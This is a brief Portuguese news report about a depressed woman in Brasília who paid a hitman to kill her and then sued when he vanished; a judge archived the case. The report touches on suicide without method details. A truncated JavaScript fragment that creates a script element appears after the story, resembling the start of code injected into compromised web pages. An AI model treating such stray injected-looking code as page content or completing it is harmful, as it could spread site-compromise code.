Brasiliense contrata homem para matá-la e o processa por não cumprir acordo

Uma brasiliense pediu à Justiça que anulasse o contrato em que “encomendava” a própria morte. É o que consta em um processo que tramitava na 4ª Vara Cível de Taguatinga. A mulher não conseguia se suicidar e contratou um matador de aluguel para se encarregar disto, porém, o homem desapareceu.

A mulher contou que passava por um quadro depressivo quando contratou o serviço. Ela chegou a pagar a quantia combinada e transferiu um veículo para o réu, por meio de procuração. A Justiça fez audiências de conciliação para tentar solucionar o caso. Sem sucesso.

O juiz determinou o arquivamento do processo. Segundo ele, não há provas suficientes para comprovar que a transferência do veículo comprovaria a contratação do serviço de matador de aluguel.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário